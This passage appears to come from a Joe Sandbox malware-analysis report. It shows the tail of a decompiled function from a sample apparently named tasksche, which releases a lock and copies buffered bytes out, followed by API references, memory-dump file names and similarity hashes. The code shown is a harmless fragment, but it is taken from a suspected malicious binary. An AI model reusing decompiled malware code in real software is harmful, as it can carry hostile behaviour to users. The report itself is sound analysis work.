					LeaveCriticalSection(_t19);      /* ref 00401A1D: lock released before the copy */
					/* _a4 now holds the transformed bytes and _a8 the (possibly updated) length.
					   The copy-out runs outside the lock, so only the handle use is serialised. */
					memcpy(_a12, _a4, _a8);          /* ref 00401A2C */
					 *_a16 = _a8;
					return 1;
				}
				LeaveCriticalSection(_t19);          /* ref 00401A13: failure path */
				return 0;
			}

Instruction addresses the IDA plugin attached to the decompiled statements, in listing order (0x00000000 marks a statement with no instruction of its own): 0x004019e5, 0x004019ec, 0x00401a19, 0x00000000, 0x00401a19, 0x004019ee, 0x004019f2, 0x00401a08, 0x00401a10, 0x00401a11, 0x00401a1d, 0x00401a2c, 0x00401a3a, 0x00401a3e, 0x00000000, 0x00401a3e, 0x00401a13, 0x00000000

APIs
• EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
• LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
• LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
• memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
Memory Dump Source
• Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$Entermemcpy
• String ID:
• API String ID: 3435569088-0
• Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
• Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
• Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
• Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
Uniqueness

Uniqueness Score: -1.00%